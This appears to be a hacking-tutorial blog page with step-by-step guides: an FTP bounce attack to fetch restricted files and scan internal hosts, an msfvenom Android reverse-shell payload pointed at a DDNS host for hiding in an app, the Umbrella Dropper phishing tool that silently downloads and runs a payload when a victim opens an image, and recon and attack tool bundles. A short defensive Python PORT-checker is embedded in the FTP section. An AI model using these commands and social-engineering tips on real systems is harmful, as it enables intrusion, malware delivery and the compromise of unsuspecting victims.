Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack


The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far wider in scope, sophistication, and impact than previously thought.
News of…


NSA Warns Of Russian Government-Backed Hackers Aiming At US Defense Sector Targets


The National Security Agency issued an alert Monday warning…

JP Morgan – $1B Fine – You Gotta Read This


I mean seriously… the rest of us have to play fair. They were allegedly running a racketeering operation?

Original post: https://shedly.com/5A4je

Social Media Site for Hackers?


How to Hack Internal Private Systems Using FTP Bounce Attack?


Hello hackers, so today we are going to learn how to attack internal private FTP servers through a public server that we compromised earlier, having obtained login credentials for its FTP port by brute force with Hydra. This method is known as an FTP bounce attack because the packets we send bounce through an intermediate public server to the private victim machine.

The motive

You are a user at a non-US site with IP address F.F.F.F and want to retrieve cryptographic source code from crypto.com in the US. The FTP server at crypto.com is set up to allow you to connect, but to deny access to the crypto sources because your source IP address belongs to a non-US site [as far as the server can tell from DNS]. In any case, you cannot directly retrieve the source code from crypto.com’s server.

However, crypto.com allows ufred.edu to download the crypto sources because ufred.edu is in the US. You happen to know that the /incoming directory on ufred.edu is world-writable, so any anonymous user can drop files there and read them back. Let us assume that crypto.com’s IP address is C.C.C.C.


The attack

Now, assuming you have an FTP server that supports passive mode: open an FTP connection to your own machine’s real IP address [not localhost] and log in. Change to a convenient directory that you have write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this.

Construct a file containing FTP server commands. Let’s call this file “instrs”. It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULs and nothing else, enough to fill up about 60K of extra data.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your “instrs” file over and then tells ufred.edu’s FTP server to connect to crypto.com’s FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

crypto.tar.Z should now show up as “foobar” on your machine via your first FTP connection. If the connection to ufred.edu didn’t die by itself due to an apparently common server bug, clean up by deleting “instrs” and exiting. Otherwise, you’ll have to reconnect to finish.

FTP Bounce Port Scanning
You can use the nmap port scanner in Unix and Windows environments to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

nmap -P0 -b username:password@ftp-server:port <target host>

The following example shows an FTP bounce port scan being launched through the Internet-based host 142.51.17.230 to scan an internal host at 192.168.0.5, a known address previously enumerated through DNS querying.

FTP bounce scanning with nmap

	# nmap -P0 -b 142.51.17.230 192.168.0.5 -p21,22,23,25,80
	Starting nmap 3.45 ( www.insecure.org/nmap/ )
	Interesting ports on (192.168.0.5):
	Port     State   Service
	21/tcp   open    ftp
	22/tcp   open    ssh
	23/tcp   closed  telnet
	25/tcp   closed  smtp
	80/tcp   open    http

	Nmap run completed — 1 IP address (1 host up) scanned in 12 seconds

Note:
When performing any type of bounce port scan with nmap, you should specify the -P0 option. This stops nmap from sending its own ping probes directly to the target host to ascertain whether it is up, so only the bounce host appears to be probing the target.

FTP Bounce Exploit Payload Delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to bounce attack, you can then send that information to a specific service port (either on the local host or other addresses). This concept is shown in Figure 8-2.

 An illustration of the FTP payload bounce attack



For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writable directory, and test whether the server is susceptible to FTP bounce. Solaris 2.6 is an excellent example because in its default state it is vulnerable to both FTP bounce and RPC service overflow attacks. Binary exploit data isn’t the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent unsolicited email this way.

Other possibilities

Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring the realisation of numerous other scary possibilities.

FTP Bounce Description

Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the “ftp-data” problem. For some purposes, this can be the next best thing to source-routed attacks and is likely to succeed where source routing fails against packet filters. And it’s all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.
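The server-side fix that follows from this is the one RFC 2577 recommends: only honour a PORT whose address is the control connection’s own peer and whose port is not a privileged one, which breaks both the third-party data connection and the port-20-to-port-21 trick above. As an added example (not from the original article), this Python check applies that rule to PORT arguments and audits a constructed control-session transcript; all addresses in it are made-up documentation ranges standing in for F.F.F.F and C.C.C.C.

```python
import ipaddress
import re
from typing import List, Tuple

# Argument of an FTP PORT command, RFC 959 style: h1,h2,h3,h4,p1,p2
_PORT_ARG = re.compile(
    r"^\s*(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$"
)


def parse_port_arg(arg: str) -> Tuple[str, int]:
    """Decode 'h1,h2,h3,h4,p1,p2' into (dotted IPv4 host, TCP port)."""
    m = _PORT_ARG.match(arg)
    if not m:
        raise ValueError("malformed PORT argument")
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError("PORT field out of range")
    host = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]  # p1 is the high byte, p2 the low byte
    return host, port


def port_allowed(arg: str, control_peer: str) -> Tuple[bool, str]:
    """RFC 2577 mitigation: the data connection may only go back to the host
    that owns the control connection, and never to a privileged (<1024) port."""
    try:
        host, port = parse_port_arg(arg)
    except ValueError as exc:
        return False, str(exc)
    if ipaddress.ip_address(host) != ipaddress.ip_address(control_peer):
        return False, f"third-party host {host} != control peer {control_peer}"
    if port < 1024:
        return False, f"privileged port {port} refused"
    return True, "ok"


def audit_session(transcript: List[str], control_peer: str) -> List[Tuple[str, str]]:
    """Walk a control-connection transcript (client lines prefixed 'C: ') and
    report every PORT command the rule above would reject. Useful both as the
    server-side check and as a detection pass over logged FTP sessions."""
    findings = []
    for line in transcript:
        if not line.startswith("C: "):
            continue
        verb, _, arg = line[3:].partition(" ")
        if verb.upper() != "PORT":
            continue
        ok, why = port_allowed(arg, control_peer)
        if not ok:
            findings.append((arg.strip(), why))
    return findings


# Constructed sample: the client on 203.0.113.7 (our F.F.F.F) first asks for a
# legitimate data connection to itself, then tries to bounce to 198.51.100.21
# (our C.C.C.C) port 21 exactly as the article's "port C,C,C,C,0,21" does.
SAMPLE_PEER = "203.0.113.7"
SAMPLE_TRANSCRIPT = [
    "C: USER ftp",
    "S: 331 Guest login ok, send your email address as password.",
    "C: PASS -anonymous@",
    "S: 230 Guest login ok, access restrictions apply.",
    "C: PORT 203,0,113,7,4,1",          # back to the client, port 1025: fine
    "S: 200 PORT command successful.",
    "C: PORT 198,51,100,21,0,21",       # third-party host, port 21: bounce
    "C: PORT 203,0,113,7,0,25",         # own host but privileged port 25
]

if __name__ == "__main__":
    for arg, why in audit_session(SAMPLE_TRANSCRIPT, SAMPLE_PEER):
        print(f"rejected PORT {arg}: {why}")
```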

If you like this article kindly rate it and share it. If you have any queries please comment below and let us know how you felt about the article. To know how to find devices on the internet to hack into them, read the article How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

Thank you.

Any Android Can Be Hacked Over The Internet Using Metasploit Part : 1


Today we’ll create a Metasploit payload, embed it into an Android application and use it over the Internet!

First we have to get a DDNS (Dynamic DNS) address so that the meterpreter session can reach us over the internet. Go to the No-IP Dynamic DNS service, create an account there, and then configure the DDNS client on your system.

So for Linux distributions:

Once you have opened up your Terminal window you will need to login as the “root” user. You can become the root user from the command line by entering “sudo -s” followed by the root password on your machine.

  1. cd /usr/local/src/
  2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. tar xf noip-duc-linux.tar.gz
  4. cd noip-2.1.9-1/
  5. make install

You will then be prompted to login with your No-IP.com account username and password.

If you get “make not found” or “missing gcc” then you do not have the gcc compiler tools on your machine. You will need to install these in order to proceed.


To Configure the Client

As root again (or with sudo) issue the below command:

/usr/local/bin/noip2 -C

(dash capital C, this will create the default config file)

You will then be prompted for your No-IP username and password, as well as which hostnames you wish to update. Be careful: one of the questions is “Do you wish to update ALL hosts”. If answered incorrectly this could affect hostnames in your account that are pointing at other locations.

Now the client is installed and configured, you just need to launch it. Simply issue this final command to launch the client in the background:

/usr/local/bin/noip2

Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup. This varies depending on what Linux distribution you are running.

After your DDNS hostname (it’ll be something like hostname.ddns.net) is configured, you have to create the Metasploit payload.

Secondly, we create the payload using msfvenom with the following command (the misspelling “msfvenome” in the original would not run):

msfvenom -p android/meterpreter/reverse_tcp LHOST=hostname.ddns.net LPORT=4444 R > payload.apk

So the payload will be created.

Thirdly, we have to bind the payload with some other APK file, such as a game or any other application;
for that we need to decompile the APK to put the Metasploit hook inside it.
Let’s see this in the second (last) part, Part 2.

Do comment below your feedback on this article! Thank You!

How to Hack Using Umbrella Dropper!? A Phishing Tool


Hello, hackers. Today we are going to learn about Umbrella Dropper, a tool aimed at pen-testing: it downloads files onto the target system and executes them without a second, explicit execution of the downloaded .exe, only by opening the file the link is embedded in.

I know most of you might want to compromise a victim just by sending an ordinary-looking file which, when opened, opens a malicious link that automatically downloads the payload from a remote server and executes it, without the downloaded .exe having to be run a second time. You can even compromise a victim by embedding a malicious backdoor in a zip file together with an image and sending it to them; for that, follow the article How To Hack Any Windows 7/8/10 Remotely Using An Image.

Well, there are a lot of tools for that, and thanks go to GitHub for being an open platform where developers and testers share source code and files. GitHub has been a haven for penetration testers and n00bies looking for cool and perilous stuff such as payload generators, scanners and injectors, etc.

Features

  • Download executable on the target system.
  • Silent execution.
  • Download and execute executable once time.
  • If the exe has already been downloaded and is running, open only the pdf/docx/xls/jpg/png.
  • Some Phishing methods are included.
  • Multiple Session disabled.
  • Bypass UAC.

Needed dependencies

  • apt
  • wine
  • wget
  • Linux
  • sudo access
  • python2.7
  • python 2.7 on Wine Machine

Installation of Umbrella:

  • First, we need to clone [download] the GitHub repository with the command “git clone https://github.com/4w4k3/Umbrella.git”
  • Now change your directory to the downloaded folder: “cd Umbrella”
  • Make the installer file executable using the command “chmod +x install.sh”
  • Run the installer using “./install.sh”. This will attempt to install all the required dependencies needed for the program to run and update your system.

umbrella dropper files

  • To run the script we invoke it through the interpreter, “python umbrella.py”. Since it is a Python script we tell the terminal that we are running a Python script by prefixing it with python; we can also run it with “./”, which marks it as an executable file on Linux.

umbrella dropper python installation

  • During the installation you will be prompted with a Wine installation pop-up; we just need to specify Windows 7 or XP, which will attempt to install the Windows .NET framework needed to create an executable file. Next, it will ask you to install Python; choose the repair option to make the necessary changes to the Python libraries.

umbrella dropper error

Note: If you face any problems with the installation or any error in Python, simply type “python -m pip install --upgrade pip”. This will attempt to upgrade pip and the Python modules and fix the installation automatically.

Using Umbrella Dropper:

After the installation you will be greeted with the umbrella interface where you will have four options saying:

umbrella dropper interface

  1. [D] GEN DROPPER
  2. [H] HELP
  3. [U] UPDATE
  4. [E] EXIT

umbrella dropper payload options

To generate payload type in D

This time you need to specify the file type you wish to use for the exploit. Next, you need to specify the URL for the .exe file.

Suppose you are running Apache locally. Then place the malicious payload [say payload.exe], generated with one of the various payload-generating tools, in your “/var/www/html/” directory, and the URL would be your local “IPaddress/payload.exe”. To find your local IP, type “ifconfig” in a terminal. If you are conducting the test over the WAN, you need to upload the file to a web server reachable from the public internet. For this tutorial I am using my local web server, as shown in the screenshot:

umbrella dropper payload URL

When it asks for the URL, enter the URL of the payload on the server, but remember to check whether the victim can actually reach it; if the victim can’t, it is a complete waste of time. Next it will ask for the image URL that serves as the transporter; I have given the URL as seen in the screenshot below:

umbrella dropper transport URL

This will produce a file in the “dist/” directory of the Umbrella folder. Send this to the victim; when they open the image the payload gets executed automatically. Thinking as a hacker, we can take advantage of how the feature works: when the victim opens the file, the web browser opens the embedded link, and since our link points at a payload, it is downloaded and executed without the victim having to run it a second time, and we get a meterpreter session in our terminal. With some social engineering one could pick an image the victim is likely to want, for example a wallpaper, embed the payload in it and upload it to a file-sharing server, or create a whole album of such images and send the victim the link; if the victim likes an image and downloads it, the job is done and Umbrella does its magic and presents us with a meterpreter shell.

But, as mentioned, being a hacker is less about hacking than about thinking like a hacker; in the end it is up to you to develop your own ideas about techniques. If you like this article kindly rate it above and share it. If you have any queries then comment below and let us know. To know how to hack Kali Linux, read the article How To Hack The Hacker’s OS Kali Linux. Thank you.

How To Hack Anything Using All-In-One lscript Tool ? : Step-By-Step Guide


Hello hackers, hope you guys are doing well. Today’s tutorial is for our n00bies and for all those hackers who want all their tools in a single place so they have to type less. “lscript” is a script written by Aris Melachroinos which lets you automate penetration-testing tasks easily. It installs all the best tools available, as of 2017, for Kali Linux.

FEATURES: Custom keyboard shortcuts, launch any tool within lscript
Enabling-Disabling interfaces faster
Changing Mac faster
Anonymizing yourself faster
View your public IP faster
View your MAC faster
**TOOLS**
	(This installer installs every tool you need automatically! (except Zatacker))
	Fluxion				by Deltaxflux
	WifiTe				by derv82
	Wifiphisher			by Dan McInerney
	Zatacker			by ???
	Morpheus			by Pedro ubuntu  [ r00t-3xp10it ]
	Osrframework			by i3visio
	Hakku				by 4shadoww
	Trity				by Toxic-ig
	Cupp				by Muris Kurgas
	Dracnmap			by Edo -maland-
	Fern Wifi Cracker		by Savio-code
	Kichthemout			by Nikolaos Kamarinakis & David Schütz
	BeeLogger			by Alisson Moretto - 4w4k3
	Ghost-Phisher			by Savio-code
	Mdk3-master                     by Musket Developer
	Anonsurf                        by Und3rf10w
	The Eye                         by EgeBalci
	Airgeddon                       by v1s1t0r1sh3r3
	Xerxes                          by zanyarjamal
	Ezsploit                        by rand0m1ze
	Katana framework                by PowerScript
	4nonimizer                      by Hackplayers
	Sslstrip2                       by LeonardoNve
	Dns2proxy                       by LeonardoNve
	Pupy                            by n1nj4sec
	Zirikatu                        by pasahitz
	TheFatRat                       by Sceetsec
	Angry IP Scanner                by Anton Keks
	Sniper                          by 1N3
	ReconDog                        by UltimateHackers
	RED HAWK                        by Tuhinshubhra
**Wifi password scripts**
	Handshake       (WPA-WPA2)
	Find WPS pin    (WPA-WPA2)
	WEP hacking     (WEP)

How to Install lscript?

This tool is available on GitHub; follow these simple steps to install it:

  1. Open up a terminal and navigate to your working directory.
  2. Type in the following command: “git clone https://github.com/arismelachroinos/lscript.git”. This will clone the GitHub repository into a single folder named lscript.
  3. Now change your directory to the cloned folder using the command “cd lscript”.
  4. Type in “ls” to see the files present in the working directory. Before running the setup file we need permission to execute it; to do this type “chmod +x install.sh”.

lscript installation

  5. Type “./install.sh” to start the installation process. This will attempt to download all the required dependencies and tools from GitHub.

How to use lscript?

  1. Open another terminal and type in “l”; this will start the lazy script.
  2. You will now be presented with options for:
  • ifconfig
  • Enabling/Disabling Wi-Fi and Monitor mode on wifi
  • Changing/Restoring MAC
  • Starting/disabling Anonymous surf
  • checking the anonymous status
  • view your public IP Address
  • View your MAC ID
  • Tools available with in the script (downloaded/required to be downloaded)
  • Handshakes captured
  • Find WPS pin
  • WEP Hacking
  • MITM attack
  • Metasploit
  • E-Mail Spoofing … as shown in the screenshot:


To check for tools type in “9”. It will list the available options for tools, as shown in the following screenshot; we can see that we have options for:

  • Wi-Fi tools
  • Remote Access
  • Information Gathering
  • Installing /Re installing tool

lscript tool menu

To list all the tools we can install, move into Installing tools; this will list all the tools available to us as described above, shown in the following screenshot.

lscript tools script

To list the tools available for remote access, we check the Remote Access menu, where we find the most useful tools for creating payloads to exploit a victim, as seen in the screenshot.

For wifi hacking we have many tools, as we can see listed in the screenshot:

lscript wifi tools description

So without wasting your time, install these tools to save yourself some typing. Hope you liked this article; please comment below if you have any queries regarding the tool or any other topic, and do share so that your hacker group learns about these tools available publicly on the internet. If you wish to know how to hack Kali Linux read the article How To Hack The Hacker’s OS Kali Linux, and if you want to hack a friend within your network then follow the article How To Hack With Xerosploit.

Thank you.

RED HAWK: Multiple Scanning And Attack Vector


Hello friends, so today we are going to learn about a tool called RED HAWK, which can be used to gather information about a target and determine crucial details such as the company’s hosting provider, location, protocols used, etc. This all comes under information gathering, the most crucial part of any hack or simulated hack for a hacker or pentester. Information gathering mainly consists of:

  • Network architecture
  • Connected devices
  • Open ports
  • Running services
  • Known vulnerabilities
  • Password profiling,etc……

There are many information gathering tools available on GitHub and elsewhere on the internet; one of them is RED HAWK.

RED HAWK is one of the best information gathering tools written in PHP. It is an all-in-one tool capable of information gathering (using WHOIS lookup, WordPress and reverse IP scanning, etc.), SQL vulnerability scanning and crawling.

to know more about information gathering visit this page Information Gathering

Features Of The Tool:

  • Server detection
  • CloudFlare detector
  • robots scanner
  • CMS Detector
  • WordPress
  • Joomla
  • Drupal
  • Magento
  • Whois
  • GEO-IP Scan
  • NMAP Port Scan
  • DNS Lookup
  • SubNet Calculator
  • Subdomain Finder
  • Reverse IP Scanner
  • CMS detection For Sites On the same server.
  • Parameter Finder
  • Error based SQLi Detector
  • Crawler
    • Basic Crawler {69}
      [ – ] Admin scanner
      [ – ] Backups Finder
      [ – ] Misc. Crawler
    • Advance Crawler {420}
      [ – ] Admin scanner
      [ – ] Backups Finder
      [ – ] Misc. Crawler

To get RED HAWK we need to clone it from GitHub or download the zip file from GitHub.

The Installation:

  1. Open up a terminal and type in “git clone https://github.com/Tuhinshubhra/RED_HAWK.git”

This will clone the git repository and place all its files into a directory named RED_HAWK in your working directory.

If you have downloaded the zip instead, just extract it and open a terminal in the extracted folder.

  2. Now change your directory to the RED_HAWK folder using the command “cd RED_HAWK”.
  3. We can list the files in the folder using the “ls” command. To run RED HAWK type in “php rhawk.php”.
  4. You will get the RED HAWK interface. Type “help” to list the available options. NOTE: if you face any error running the tool, type “fix”; this will install all required modules.

Fix content

  5. Type in the domain name you want to scan (without http:// or https://). For example we are setting facebook.com as the target.
  6. Select whether the site runs on HTTPS or not. If it does, it is preferable to select HTTPS for better scanning and results.

NOTE: if the scanner stops working after CloudFlare detection, use the fix command or manually install php-curl and php-xml.

As seen in the screenshot below, it runs an nmap scan to identify services on ports, find open ports and gather information about the operating system, firewall, traceroute, etc. To know more about nmap scans, please read the article All Nmap tool commands at your fingertips!

It also performs a DNS scan of the target to look for DNS weaknesses and displays the subnet of the target we selected; here we can see that Facebook uses the IPv6 protocol.

This tool also determines the geographical location of the target, similar to the results of Shodan. To learn about Shodan read the article How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

As mentioned, this tool does more than we can imagine. It makes our work easier by automating all the required information gathering tasks, covering every point of interest about the target.

Hope you enjoyed reading this article. If you did, kindly share it to let your hacker friend(s) know that there is a tool that can make their information gathering work simpler and easier, giving them plenty of time to plan the attack. If you have any queries regarding the article then comment below and let us know how you felt reading it. Thank you.